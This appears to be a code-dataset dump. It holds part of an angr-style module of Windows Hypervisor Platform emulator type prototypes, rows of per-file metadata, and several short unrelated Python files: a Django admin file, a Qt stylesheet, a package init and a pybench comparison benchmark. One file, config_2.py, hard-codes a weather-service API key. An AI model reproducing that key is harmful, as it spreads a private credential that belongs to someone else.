SimTypeChar(label="Byte"), "Fp": SimUnion({"Anonymous": SimStruct({"Mantissa": SimTypeLongLong(signed=False, label="UInt64"), "_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "FpControlStatus": SimUnion({"Anonymous": SimStruct({"FpControl": SimTypeShort(signed=False, label="UInt16"), "FpStatus": SimTypeShort(signed=False, label="UInt16"), "FpTag": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "LastFpOp": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"LastFpRip": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpEip": SimTypeInt(signed=False, label="UInt32"), "LastFpCs": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "XmmControlStatus": SimUnion({"Anonymous": SimStruct({"Anonymous": SimUnion({"LastFpRdp": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpDp": SimTypeInt(signed=False, label="UInt32"), "LastFpDs": SimTypeShort(signed=False, label="UInt16"), "Reserved": SimTypeShort(signed=False, label="UInt16")}, 
name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None"), "XmmStatusControl": SimTypeInt(signed=False, label="UInt32"), "XmmStatusControlMask": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "Segment": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Table": SimStruct({"Pad": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Limit": SimTypeShort(signed=False, label="UInt16"), "Base": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_X64_TABLE_REGISTER", pack=False, align=None), "InterruptState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingInterruption": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "DeliverabilityNotifications": SimUnion({"Anonymous": 
SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "ExceptionEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32"), "ExceptionParameter": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "ExtIntEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64"), "Reserved2": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "InternalActivity": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingDebugException": SimUnion({"AsUINT64": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="<anon>", label="None"), 
label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "RegisterNames", "RegisterCount", "RegisterValues"]), offset=0), "WHvEmulatorSetVirtualProcessorRegisters": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="WHV_REGISTER_NAME"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimUnion({"Reg128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None"), "Reg64": SimTypeLongLong(signed=False, label="UInt64"), "Reg32": SimTypeInt(signed=False, label="UInt32"), "Reg16": SimTypeShort(signed=False, label="UInt16"), "Reg8": SimTypeChar(label="Byte"), "Fp": SimUnion({"Anonymous": SimStruct({"Mantissa": SimTypeLongLong(signed=False, label="UInt64"), "_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "FpControlStatus": SimUnion({"Anonymous": SimStruct({"FpControl": SimTypeShort(signed=False, label="UInt16"), "FpStatus": SimTypeShort(signed=False, label="UInt16"), "FpTag": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "LastFpOp": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"LastFpRip": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpEip": SimTypeInt(signed=False, label="UInt32"), 
"LastFpCs": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "XmmControlStatus": SimUnion({"Anonymous": SimStruct({"Anonymous": SimUnion({"LastFpRdp": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpDp": SimTypeInt(signed=False, label="UInt32"), "LastFpDs": SimTypeShort(signed=False, label="UInt16"), "Reserved": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None"), "XmmStatusControl": SimTypeInt(signed=False, label="UInt32"), "XmmStatusControlMask": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "Segment": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, 
name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Table": SimStruct({"Pad": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Limit": SimTypeShort(signed=False, label="UInt16"), "Base": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_X64_TABLE_REGISTER", pack=False, align=None), "InterruptState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingInterruption": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "DeliverabilityNotifications": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "ExceptionEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32"), "ExceptionParameter": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "ExtIntEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64"), "Reserved2": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", 
pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "InternalActivity": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingDebugException": SimUnion({"AsUINT64": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="<anon>", label="None"), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "RegisterNames", "RegisterCount", "RegisterValues"]), offset=0), "WHvEmulatorTranslateGvaPage": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="WHV_TRANSLATE_GVA_FLAGS"), SimTypePointer(SimTypeInt(signed=False, label="WHV_TRANSLATE_GVA_RESULT_CODE"), offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "Gva", "TranslateFlags", "TranslationResult", "Gpa"]), offset=0)}, name="WHV_EMULATOR_CALLBACKS", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Callbacks", "Emulator"]),
#
'WHvEmulatorDestroyEmulator': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator"]),
#
'WHvEmulatorTryIoEmulation': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"ExecutionState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT16": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None"), "_bitfield": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "Reserved2": SimTypeInt(signed=False, label="UInt32"), "Cs": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Rip": SimTypeLongLong(signed=False, label="UInt64"), "Rflags": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_VP_EXIT_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"InstructionByteCount": SimTypeChar(label="Byte"), "Reserved": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 3), "InstructionBytes": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16), "AccessInfo": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "PortNumber": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Rax": SimTypeLongLong(signed=False, label="UInt64"), "Rcx": SimTypeLongLong(signed=False, label="UInt64"), "Rsi": SimTypeLongLong(signed=False, label="UInt64"), "Rdi": 
SimTypeLongLong(signed=False, label="UInt64"), "Ds": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Es": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None)}, name="WHV_X64_IO_PORT_ACCESS_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator", "Context", "VpContext", "IoInstructionContext", "EmulatorReturnStatus"]),
#
'WHvEmulatorTryMmioEmulation': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"ExecutionState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT16": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None"), "_bitfield": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "Reserved2": SimTypeInt(signed=False, label="UInt32"), "Cs": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Rip": SimTypeLongLong(signed=False, label="UInt64"), "Rflags": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_VP_EXIT_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"InstructionByteCount": SimTypeChar(label="Byte"), "Reserved": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 3), "InstructionBytes": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16), "AccessInfo": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "Gpa": SimTypeLongLong(signed=False, label="UInt64"), "Gva": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_MEMORY_ACCESS_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, 
name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator", "Context", "VpContext", "MmioInstructionContext", "EmulatorReturnStatus"]),
}
lib.set_prototypes(prototypes)
| 748.166667 | 15,771 | 0.74413 | 2,458 | 22,445 | 6.670871 | 0.071603 | 0.120754 | 0.175642 | 0.149357 | 0.920534 | 0.894188 | 0.885894 | 0.869305 | 0.864914 | 0.86217 | 0 | 0.027706 | 0.056048 | 22,445 | 29 | 15,772 | 773.965517 | 0.746212 | 0.001247 | 0 | 0 | 0 | 0 | 0.278395 | 0.033516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.277778 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
558abae7e156a851ecb670162a2fa7638041ef1d | 55 | py | Python | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | weather_api_key = "aca14197627f0cd52f348a2e828f60b5"
| 13.75 | 52 | 0.854545 | 4 | 55 | 11.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.42 | 0.090909 | 55 | 3 | 53 | 18.333333 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0.603774 | 0.603774 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e978f1a3270d583e21924676297a0f5ad745290b | 186 | py | Python | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | null | null | null | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | null | null | null | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | 1 | 2020-12-28T08:03:01.000Z | 2020-12-28T08:03:01.000Z | from django.contrib import admin
# Register your models here.
from django.contrib import admin
# Register your models here.
from .models import GameMode
admin.site.register(GameMode)
| 18.6 | 32 | 0.801075 | 26 | 186 | 5.730769 | 0.423077 | 0.134228 | 0.228188 | 0.308725 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0 | 0 | 0.139785 | 186 | 9 | 33 | 20.666667 | 0.93125 | 0.284946 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e9824206e3bb46d28e5e052e48220f57bd74e7ee | 167 | py | Python | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | from overrides.overrides import overrides
from overrides.final import final
from overrides.overrides import __VERSION__
from overrides.enforce import EnforceOverrides
| 33.4 | 46 | 0.88024 | 20 | 167 | 7.15 | 0.35 | 0.363636 | 0.307692 | 0.391608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095808 | 167 | 4 | 47 | 41.75 | 0.94702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
75d25c5da6f3f818cbcc31f26a214718e3212ccd | 200 | py | Python | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | 4 | 2021-04-12T19:30:47.000Z | 2022-02-11T18:24:16.000Z | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | null | null | null | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | null | null | null | __author__ = "Robert Kist"
frame_style = '''
#windowFrame {
border-radius: {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px;
}
'''
| 22.222222 | 131 | 0.77 | 28 | 200 | 4.892857 | 0.392857 | 0.350365 | 0.525547 | 0.583942 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0 | 0 | 0.11 | 200 | 8 | 132 | 25 | 0.769663 | 0 | 0 | 0 | 0 | 0.166667 | 0.805 | 0.545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f94425d3c6c87eee1ded7efe7931b5f9c61dd9c0 | 13,308 | py | Python | pybench/Numbers.py | haypo/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | 3 | 2018-01-17T18:45:23.000Z | 2020-10-02T06:26:03.000Z | pybench/Numbers.py | vstinner/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | null | null | null | pybench/Numbers.py | vstinner/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | 4 | 2018-01-17T18:45:23.000Z | 2020-10-08T15:24:51.000Z | import pyperf
import six
from six.moves import xrange
from pybench import Test
if six.PY3:
long = int
class CompareIntegers(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
return pyperf.perf_counter() - t0
class CompareFloats(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
